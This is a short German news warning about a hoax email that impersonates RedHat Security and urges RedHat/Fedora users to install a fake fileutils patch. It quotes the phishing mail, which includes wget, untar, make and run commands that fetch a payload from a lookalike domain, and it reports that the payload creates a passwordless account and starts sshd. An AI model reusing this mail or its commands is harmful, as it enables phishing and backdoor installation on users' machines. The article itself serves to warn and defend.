Hoax-Mail für RedHat/Fedora-User aufgetaucht

Laut einem Warnhinweis von RedHat Security und LinuxToday sind nun RedHat- bzw. Fedora-User verstärkt ins Visier von Angreifern geraten. RedHat warnt vor gefälschten E-Mails mit der Aufforderung, Patches zu angeblich gefährlichen Sicherheitslücken im Fileutil-Paket zu installieren. Laut der unsignierten Mail seien die Programme „ls“ und „mkdir“ korrupt und würden so möglichen Angreifern Tür und Tor öffnen, über das Netz eigenen Code ausführen zu können.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps: First download the patch from the Security RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

[p]Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz cd fileutils-1.0.6.patch make ./inst

[/p]

Die Downloadquelle „www.fedora-redhat.com“ ist nicht von RedHat registriert und gehört zu einem Netzblock des Anbieters Yahoo. Nach ersten Erkenntnissen installiert der Patch eine Backdoor auf dem System, in dem er ein Konto ohne Passwort anlegt und den ssh-Daemon startet.

Aus Sicherheitsgründen sollten Anwender immer die Echtheit der zu installierenden Pakete anhand einer Signatur überprüfen und niemals aufgrund unangeforderter Emails Patches einspielen oder sogar mitgeschickte Programme ausführen. Um ganz sicher zu gehen, sollte vor einem Update immer die offizielle Webseite des Distributors, in diesem Falle die RedHat-Webseite, besucht werden, um die Echtheit der empfangenen Email zu verifizieren.